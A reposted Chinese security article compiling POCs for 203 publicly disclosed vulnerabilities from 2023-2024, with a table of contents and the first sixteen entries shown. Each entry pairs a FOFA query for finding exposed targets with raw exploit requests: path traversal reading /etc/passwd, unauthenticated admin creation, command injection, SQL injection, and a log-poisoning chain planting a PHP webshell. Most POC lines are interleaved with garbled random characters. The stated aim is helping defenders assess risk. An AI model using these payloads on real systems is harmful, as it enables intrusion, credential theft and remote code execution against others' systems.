Compilation of Publicly Disclosed Internet Vulnerabilities, 2023-09 to 2024-06
Daoyi Security (道一安全) 2024-06-05 07:41 Beijing
The following article is from 网络安全新视界, by the author 网络安全新视界.

Purpose: exploitation of N-day vulnerabilities accounts for a large share of attack activity in offense/defense exercises. We hope this article helps defenders; defensive teams can use its contents for risk assessment.

Sources: the article covers 203 POCs for high-impact vulnerabilities publicly disclosed in China and abroad between September 2023 and May 2024. All were collected from other public accounts or websites on the internet and compiled and published by the 网络安全新视界 team.

Patches: all vulnerabilities listed are public; for patches or remediation guidance, contact the product vendor.

Content: due to length constraints, a few POCs that are too long are uniformly replaced by the word PAYLOAD; if you need the full POC, search for it yourself.

Legal rights: if any content infringes a party's legitimate rights, contact the 网络安全新视界 team via the account backend to have the relevant content removed.

Statement

To simplify the process and make browsing easier, there is no "reply to get the full list" gate. This article is the most complete version available; when using it, press F12 and search for the keyword you need.

Bookmark this article if you need it. You can also follow this public account (网络安全新视界).

Table of Contents

1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user addition
5. NUUO NVR video storage management device remote command execution
6. Sangfor NGAF arbitrary file read
7. Hongyun (鸿运) active safety monitoring cloud platform arbitrary file download
8. Phicomm (斐讯) router RCE
9. Doccms (稻壳CMS) keyword unauthenticated SQL injection
10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. Hongfan (红帆) iOffice ioFileDown arbitrary file read
14. Huaxia ERP (jshERP) sensitive information disclosure
15. Huaxia ERP getAllList information disclosure
16. Hongfan HFOffice (医微云) SQL injection
17. Dahua DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT integrated management platform arbitrary file read
21. Dahua ICC intelligent IoT integrated management platform random remote code execution
22. Dahua ICC intelligent IoT integrated management platform log4j remote code execution
23. Dahua ICC intelligent IoT integrated management platform fastjson remote code execution
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo endpoint SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php endpoint arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. Yunshikong (云时空) social commerce ERP validateLoginName SQL injection
52. Weaver E-Office json_common.php SQL injection
53. DPtech VPN Service arbitrary file upload
54. Chanjet T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. Byzoro Smart management platform importexport.php SQL injection
61. Zhejiang University Enter (浙大恩特) customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. Jiecheng (捷诚) management information system CWSFinanceCommon SQL injection
65. Youkate (优卡特) Lian'aiyun face-recognition smart management platform 1.0.55.0.0.1 permission bypass
66. Whir ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. Whir ezOFFICE wpsservlet arbitrary file upload
68. Whir ezOFFICE wf_printnum.jsp SQL injection
69. Whir ezOFFICE contract_gd.jsp SQL injection
70. Whir ezEIP success command execution
71. Bangyong (邦永) PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. Newcapec (新开普) campus mobile service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE (百为) flow-control router remote command execution
80. Superdata (速达) Tianyao software DesignReportSave.jsp endpoint arbitrary file upload
81. Uniview (宇视) video surveillance main-cgi password disclosure
82. Shifudi (思福迪) LOGBASE O&M security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Tosei (Japan) self-service laundry machine RCE
87. DBAPPSecurity MingYu (安恒明御) security gateway aaa_local_web_preview file upload
88. DBAPPSecurity MingYu security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon FE collaborative office platform editflow_manager SQL injection
90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. QiAnXin Netshield (网神) SecGate3600 firewall app_av_import_save arbitrary file upload
94. QiAnXin Netshield SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. Beijing Baichuo (百绰) Smart S210 management platform uploadfile.php arbitrary file upload
119. Beijing Baichuo Smart S20 backend sysmanageajax.php SQL injection
120. Beijing Baichuo Smart S40 management platform import web.php arbitrary file upload
121. Beijing Baichuo Smart S42 management platform userattestation.php arbitrary file upload
122. Beijing Baichuo Smart S200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. Hunan Jianyan (湖南建研) engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. Glodon (广联达) Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
135. Netentsec NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. Fujian Kirisun (科立讯) communication command and dispatch platform down_file.php SQL injection
138. Fujian Kirisun communication command and dispatch platform pwd_update.php SQL injection
139. Fujian Kirisun communication command and dispatch platform editemedia.php SQL injection
140. Fujian Kirisun communication command and dispatch platform get_extension_yl.php SQL injection
141. Kirisun communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. gradio arbitrary file read
154. Tianwell (天维尔) fire rescue operations dispatch platform SQL injection
155. 60 Navigation Page (六零导航页) file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. Meite (美特) CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. Yingfeida (英飞达) medical image archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. Ketuo (科拓) fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. Hefeng (和丰) multimedia information publishing system QH.aspx arbitrary file upload
163. Haoka Jituan (号卡极团) distribution management system ue_serve.php arbitrary file upload
164. Huixiaoyuan (Anxiaoyi) smart campus management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. Zhongcheng Kexin (中成科信) ticketing management platform SeatMapHandler SQL injection
167. Lean Value Management System (精益价值管理系统) DownLoad.aspx arbitrary file read
168. Hongjing (宏景) EHR OutputCode arbitrary file read
169. Hongjing EHR downlawbase SQL injection
170. Hongjing EHR DisplayExcelCustomReport arbitrary file read
171. Tongtianxing (通天星) CMSV6 vehicle positioning monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. Jinher (金和) OA C6 FileDownLoad.aspx arbitrary file read
175. Jinher OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. Jianwen (建文) project management system arbitrary file read
180. Bangguanke (帮管客) CRM jiliyu SQL injection
181. Runshen (润申) enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. Runshen enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. Guangzhou Tuchuang (图创) library cluster management system updOpuserPw SQL injection
184. Xunrao (迅饶) X2Modbus gateway AddUser arbitrary user addition
185. Realor (瑞友) Tianyi application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. Santi (叁体) Jiahui video conferencing attachment arbitrary file read
189. Lanwang (蓝网科技) clinical viewer system deleteStudy SQL injection
190. Short video matrix marketing system poihuoqu arbitrary file read
191. ESAFENET (亿赛通) electronic document security management system NavigationAjax SQL injection
192. Futong Tianxia (富通天下) foreign trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone (山石网科) Yunjian security management system setsystemtimeaction command execution
194. FE (飞企互联) enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. Volans (飞鱼星) internet behavior management system send_order.cgi command execution
196. Henan Fengsu Technology (风速科技) unified authentication platform password reset
197. Zhejiang University Enter customer resource management system Quotegask_editAction SQL injection
198. Aliyun Drive (阿里云盘) WebDAV command injection
199. Cockpit assetsmanager_upload endpoint file upload
200. SeaCMS dmku SQL injection
201. Founder (方正) all-media news editing system binary SQL injection
202. WeEngine (微擎) AccountEdit arbitrary file upload
203. Honghaiyun (红海云) EHR PtFjk file upload

POC列表
+ S" Z; L; o# \% x5 r- A; Q" q) B. z9 M7 P
02
& U1 n. b8 `7 [/ C
. l6 W3 r: |: {# C' P2 s* @9 i1. StarRocks MPP数据库未授权访问7 g" O/ W" B" S
FOFA :title="StarRocks"3 L( O W- C' y1 L6 z% G
GET /mem_tracker HTTP/1.1& k. W' v* }+ E6 C
Host: URL
, S1 E2 |1 B8 M$ L& @0 {0 U$ _; g8 z* Y$ y5 H2 \& W
6 q+ F8 _/ ]+ e4 Y+ W2. Casdoor系统static任意文件读取0 O% S6 T1 n9 R, r. Q) g
FOFA :title="Casdoor"( }" j4 t7 x" f0 y- \! J
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
: z6 {" _# z1 |# lHost: xx.xx.xx.xx:9999# p- ~0 @: D: A' K+ b% X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
9 w1 m b( q6 W5 h( ?Connection: close
( |9 a6 b5 K0 |/ @5 C4 L0 i! IAccept: */*. K: ^+ C. L* n& T8 \5 Y2 u
Accept-Language: en1 C, u6 K; h6 ], A6 k- r7 z
Accept-Encoding: gzip* z! r8 a! y8 ^6 y
+ z% K5 ?: p6 J5 H( P9 |8 P( L
* B% P* o$ A* J0 g1 c2 y( c2 {
3. EasyCVR智能边缘网关 userlist 信息泄漏. J3 p! ]6 A: x; B7 A# _
FOFA :title="EasyCVR"2 ~, i: L8 l$ W: J
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1; z& z0 r: A# N5 k1 Y
Host: xx.xx.xx.xx
9 u7 a U6 \) V( ^3 r- [
* N& }9 Z# r" X7 e6 C# l0 u' S* P7 G8 ^
4. EasyCVR视频管理平台存在任意用户添加, P9 j/ W4 J0 N# e- I- i2 @2 Q
FOFA :title="EasyCVR"
w) D/ k% t3 ~" i, Y
9 a( M* N: m4 i Jpassword更改为自己的密码md5) N: n4 ]4 P+ J' u9 u
POST /api/v1/adduser HTTP/1.13 v; D, F( e; x% o" C8 S* t+ D) K
Host: your-ip7 _# o6 m2 D, z5 V$ s
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
0 D; S3 G: G# n5 \, L7 v0 m! p* s7 y; j2 s
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=14 s/ D3 |% G# }0 x8 ~5 C
& f; Y/ D4 J0 K7 {9 Z. ~# a/ j
( ~1 Y- M6 K/ J2 K/ C, j! e: x5. NUUO NVR 视频存储管理设备远程命令执行
2 i8 R7 q; _% r6 MFOFA:title="Network Video Recorder Login"! ~, j9 R, ~8 }* G& m
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1# |0 A6 r$ J- J1 g/ C$ Z
Host: xx.xx.xx.xx
, ], X( X6 n1 F" r4 a0 N2 Z7 d: j) Y
$ E: ^2 C3 e: }) `8 A5 k, C0 D" l# ?
6. 深信服 NGAF 任意文件读取
& b; p9 y ] `; bFOFA:title="SANGFOR | NGAF"
1 Z' Y+ W! W! Q! s$ p8 OGET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
% g* L3 V& } J [Host:
# d& T0 H& Q# i7 P- I( F8 I
7 @6 R. s! E! g0 V& ~% f( @7 v. j: @0 ~: d
7. 鸿运主动安全监控云平台任意文件下载2 q3 n+ e$ v& d6 X
FOFA:body="./open/webApi.html"
& U0 s; n& i- @. R: G0 D8 EGET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
/ Y7 N; ~3 y& V4 T$ |8 e/ ]Host:
8 V$ ?2 U9 }, O2 h$ w+ ~
, ?, k- z3 k8 f. V
. k# o. x( F9 b: ?- }8. 斐讯 Phicomm 路由器RCE
' ~# I. X8 \% }FOFA:icon_hash="-1344736688"
( t1 E6 T0 Y7 }9 e默认账号admin登录后台后,执行操作: Y% N: c# C! y" {
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
( f+ K$ ]9 V7 \Host: x.x.x.x
( C0 i0 p( {; P" {0 u3 U. BCookie: sysauth=第一步登录获取的cookie
! _$ L1 V- w# J: uContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
; o) J9 {8 y# r- o$ pUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36$ u# s I- u, K9 W
6 {8 d% o2 G/ h6 T------WebKitFormBoundaryxbgjoytz( y0 K$ H. U; O1 Z& C3 q9 |4 f! z
Content-Disposition: form-data; name="wifiRebootEnablestatus"2 B) {, h2 n. D0 [: I& [ f0 I r
9 o2 s. B, C, `' B5 z* G7 {$ g2 J%s; w" N; O8 j, F
------WebKitFormBoundaryxbgjoytz: x e* O% ^3 q) D5 Q) K% Q a' i
Content-Disposition: form-data; name="wifiRebootrange"
. [: R6 b7 }2 Q# l7 y* d- v3 |" @! `- l4 H; h
12:00; id;$ d" O& K4 e4 s) d/ z: E$ K6 J
------WebKitFormBoundaryxbgjoytz
* {0 ]' b: }6 F; l, e# U( u% k2 Y$ |Content-Disposition: form-data; name="wifiRebootendrange"/ ?" w4 V- y* k) e
: `8 A5 E/ }; h# K7 ?& V%s:. M8 i0 d1 Q, [! Z9 u
------WebKitFormBoundaryxbgjoytz
) d) x) K9 ^0 W3 F" U7 v! EContent-Disposition: form-data; name="cururl2"
9 c7 ^1 ^8 \+ |3 U' M5 [- I! u* U2 X$ u1 O: J q
: h/ E; t6 _0 X- B0 ~------WebKitFormBoundaryxbgjoytz--* J7 u: A+ ~5 {; S; x# a9 _
1 n: U6 P* d2 @! V# I+ r! t/ n1 e" \
/ P8 `4 H( J3 |1 O9. 稻壳CMS keyword 未授权SQL注入- M2 o: A9 R8 d: Y3 e3 i
FOFA:app="Doccms"! V* |' E6 S/ g# d' v
GET /search/index.php?keyword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
" d. B" e$ ] ^* r& n/ Z- DHost: x.x.x.x& b: u. ]- ~6 P* Q
" L! U, }. u+ o- g8 H8 K; `
! F: Q i. B) C2 K2 D
payload为下列语句的二次Url编码/ W) E9 j8 P4 f; N1 M l D% O6 S) B5 o
/ u* k$ P$ B- O) t8 `1 }$ m: R' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#" j& E4 e8 I t# V# p% ~! g
2 H. |) ]- C* b10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
1 r' [/ t. c+ n' e# b$ \FOFA:icon_hash="953405444"
/ Z# o/ g5 Q; p( s' D
3 E. M; k7 G$ T' n' n! _7 O文件上传后响应中包含上传文件的路径
( C4 e/ G) v2 O* ^& m" W. {POST /eis/service/api.aspx?action=saveImg HTTP/1.1
2 e! ^) b$ n& r( m. C" CHost: x.x.x.x:xx
0 B6 y5 C) T9 O$ v. ~; K5 \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
% ]2 a8 c- ~( y D- d3 C8 XContent-Length: 1972 ]0 l! u+ B! y; z+ M) x% s! I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
1 X7 S* H! K/ j/ w& @1 kAccept-Encoding: gzip, deflate
1 G9 y1 k; w) T: w$ X+ }) aAccept-Language: zh-CN,zh;q=0.9( o) c# \8 t6 `9 y
Connection: close
5 I7 i' N J# C. I! o7 V2 j9 dContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
+ U; h6 D( n0 h+ c; l) b! T& {: H5 c- x
------WebKitFormBoundaryxdgaqmqu0 K, }2 Z; ?& Y0 L: p
Content-Disposition: form-data; name="file"filename="icfitnya.txt"- q1 l3 n. e9 p. i% g
Content-Type: text/html
+ m) e, V7 [! J% a& i4 V" Q" @) }3 C: f |$ C; s
jmnqjfdsupxgfidopeixbgsxbf$ n4 F9 u2 B8 X2 i. ~) K9 p( @
------WebKitFormBoundaryxdgaqmqu--/ f u1 z3 y" q! z7 i3 t* q
% e7 R$ _: [' f4 V# ]
0 |, @# R, `3 ]" q11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
4 V; r w9 ~+ ?9 ^6 l& s/ }FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
) h7 }: _" p$ ^) i6 cGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1. T" ]& y4 n( E3 y% s6 y- K$ `
Host: 127.0.0.17 ^6 _6 W+ u2 z' X
Pragma: no-cache# ^2 c* X# z$ \4 n
Cache-Control: no-cache' H4 u* P( l7 Z3 U: W' L
Upgrade-Insecure-Requests: 1
% q: A6 ?3 y+ `8 `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36$ k% G; w% p5 \) o: c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7- j% w. x/ a+ {/ {2 k: R5 B
Accept-Encoding: gzip, deflate- A8 A/ m* F6 b4 J8 q6 D# v8 J
Accept-Language: zh-CN,zh;q=0.9,en;q=0.83 y# p& s% ? z( X$ Y
Connection: close; s1 p% l4 q% W6 `( o
: j6 W' y( A6 T+ H) V9 @1 I
D! ?& [" v W
12. Jorani < 1.0.2 远程命令执行$ s4 I1 `8 G; r- e4 J3 K: e2 q
FOFA:title="Jorani"
8 ?( L2 f6 }) E" A* I/ Y% s- ]4 ?第一步先拿到cookie$ C1 R, a, @% e d% Z
GET /session/login HTTP/1.18 b$ Z* [# a/ h/ N$ ]% A
Host: 192.168.190.30% u4 R/ ^% |% }5 Y3 Q5 L0 H+ T3 \
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36* _- e0 f7 U, u( G: c( Y
Connection: close
4 P( C3 i: \6 [9 D( nAccept-Encoding: gzip
7 |8 m: H2 ]- p( x4 H" c) ^
3 ?7 |; b; A+ {+ w5 D9 ]. s/ ?9 k- P! R
响应中csrf_cookie_jorani用于后续请求
! T( y+ i9 p( jHTTP/1.1 200 OK
% ]& c5 e% ]: Z8 ?" ~Connection: close
& l6 V$ F* B# c& n- n, n9 bCache-Control: no-store, no-cache, must-revalidate
: J( m7 g+ _% _3 z5 L4 ^& cContent-Type: text/html; charset=UTF-8
& L: {% f5 q7 J* }4 TDate: Tue, 24 Oct 2023 09:34:28 GMT; z7 j( q, Q6 F2 M T
Expires: Thu, 19 Nov 1981 08:52:00 GMT3 I9 j6 ?* c( I# E0 n7 q
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
# i, M: g) l( s+ S7 y- U' UPragma: no-cache
* s) X6 y$ {% |* t% |" _Server: Apache/2.4.54 (Debian)4 K4 }; x" x4 E/ T& `; i, w5 q
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
! i1 \3 e+ c R- o6 a, o; hSet-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly2 u' F( W( o8 p7 z6 \% j9 J
Vary: Accept-Encoding
* T1 }6 ]+ d( p: ?
, K2 _+ j0 m2 y3 C8 V& z. c5 p/ y. B# m7 W+ O; g& O& b: U7 e7 v0 h
POST请求,执行函数并进行base64编码* C, F1 g+ K+ u% ?
POST /session/login HTTP/1.15 U' o+ o5 ?! S/ y9 d; ~
Host: 192.168.190.30' `: p; m; |0 d0 A8 r
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
7 \0 ]4 \% b7 V q3 p2 mConnection: close
6 c' E& O/ S$ p _9 B$ E; vContent-Length: 252
% ?6 f% f$ O7 ]. a( ?7 MContent-Type: application/x-www-form-urlencoded
/ |+ Q1 A3 X0 _- ~* R2 x ^/ D% JCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r0 a' ?2 B! r9 \. p( K, V& v. N
Accept-Encoding: gzip. X. n& F2 Z* m. D
$ X( l' f2 R) vcsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
( w, I0 @. P- R& }
/ L! N2 D# v5 j5 `1 u, {7 D n5 {1 ]+ P+ O# g
! g+ j( A1 H8 u* t+ |3 c8 M( H% ]4 f向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串- P8 U* `: p( l$ ?/ {5 {
GET /pages/view/log-2023-10-24 HTTP/1.1
7 X6 e+ @! C$ I$ o% fHost: 192.168.190.30
7 L1 O, Y u# S: E3 hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.360 V+ }) F2 M- a# O/ L* C/ a r
Connection: close3 F1 ?1 [+ L4 g3 Z4 e( Y9 g
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r4 M/ O8 o+ F; s" ?7 }' N
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
/ j" P' o5 ? |X-REQUESTED-WITH: XMLHttpRequest6 q( E: i7 g" j5 h; A4 \
Accept-Encoding: gzip
; G& M7 Y m. C6 o$ l4 q [, Q/ U
, z; ?, J/ M& f+ H( M$ T) r; G$ X2 G* |
13. 红帆iOffice ioFileDown任意文件读取
2 Q' K& n/ ?! j' N* ~FOFA:app="红帆-ioffice"" O. f/ t0 H0 S/ `
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
. i( S ?( o0 e8 hHost: x.x.x.x; m/ A/ E4 n0 J
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
, A) D9 K' \+ j& ?9 }# w9 c1 xConnection: close4 V& @4 b: u; H( z0 B$ _
Accept: */*3 V$ @0 p! B( j! a
Accept-Encoding: gzip
* ]3 g- D# \" N9 ~- V" x# n6 x5 Y T/ D8 L6 B- E- j! [$ f
" z o) i4 I2 x14. 华夏ERP(jshERP)敏感信息泄露1 C6 i4 H9 H, T" h0 V! V
FOFA:body="jshERP-boot"
8 s1 P2 o, |! ]; S& u$ G0 x泄露内容包括用户名密码$ C) G+ F/ b! h" B4 R' I" Z3 x
GET /jshERP-boot/user/getAllList;.ico HTTP/1.15 W) z4 m" m/ N
Host: x.x.x.x
) ~6 p1 G4 |4 _ s! [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.369 H8 u9 J4 l/ A$ t8 D5 E: y
Connection: close8 \ Y' d+ A* [! a; s! B
Accept: */*5 `4 P/ |6 m4 M9 K1 B7 z
Accept-Language: en
, z- `- a9 j/ c$ N8 q# E5 U! q5 [Accept-Encoding: gzip' `9 K2 D& t- q3 L G7 O/ `
+ p8 b* q' x* y8 J0 o) E5 m$ \
@) I: [- j& p" u) D15. 华夏ERP getAllList信息泄露
( w0 [+ c# ]. I }# v* w8 i# b- @CVE-2024-04904 h9 o! e" v8 W7 L
FOFA:body="jshERP-boot". v2 J5 g+ {' O
泄露内容包括用户名密码
- Y3 G1 |# y+ jGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1' M* G, {$ t+ f& Y8 p7 |: L; R' |+ l
Host: 192.168.40.130:100
1 f9 c ^& ~* ~+ r; ]! o* rUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36/ R+ [3 e6 x7 a3 j( x' X& S" v' |# ~: ?
Connection: close. \; c% G3 f) C$ T& c/ u4 [
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
3 z: d5 j- I& V% i& e2 {Accept-Language: en
& o1 z+ m: m+ b+ Y& zsec-ch-ua-platform: Windows1 j* j2 z, E3 P, ~8 G6 q# j4 g1 j
Accept-Encoding: gzip
6 ~' F& \( W5 F1 Y5 i( i5 _8 A5 a# G! s9 o5 u
1 L8 u) Z! ?6 ^$ X16. 红帆HFOffice医微云SQL注入
1 z: j( y/ U1 U6 j+ d" l5 fFOFA:title="HFOffice"
% m( J$ s3 R& @( a7 U) s# `8 Rpoc中调用函数计算1234的md5值
- Q. Z1 S/ G$ F6 @% @, e- ~! v9 hGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.17 |/ a6 A: Y5 h. p( k0 T. X
